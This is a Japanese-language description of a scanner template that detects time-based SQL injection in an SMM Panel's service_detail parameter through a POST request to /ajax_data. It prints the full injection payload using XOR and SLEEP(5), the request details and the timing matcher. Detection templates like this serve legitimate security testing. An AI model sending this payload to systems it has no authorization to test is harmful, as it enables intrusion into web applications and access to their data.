
SMM パネル向けの時間ベース SQL インジェクション検出テンプレート。/ajax_data への巧妙に細工された POST リクエストを介して service_detail パラメータを標的とし、応答遅延を使用して脆弱性を確認します。
SMM Panel向け時間ベースのSQLインジェクション検出
このテンプレートは、SMM Panelのservice_detailパラメータにおける時間ベースのSQLインジェクション脆弱性を、/ajax_dataへのHTTP POSTリクエストを介して検出します。悪用されると、リモート攻撃者が機密データにアクセスしたり、権限を昇格させたりする可能性があります。
ツールは細工されたPOSTリクエストを送信します:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
応答時間が5秒以上の場合、脆弱なエンドポイントであることを示します。
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
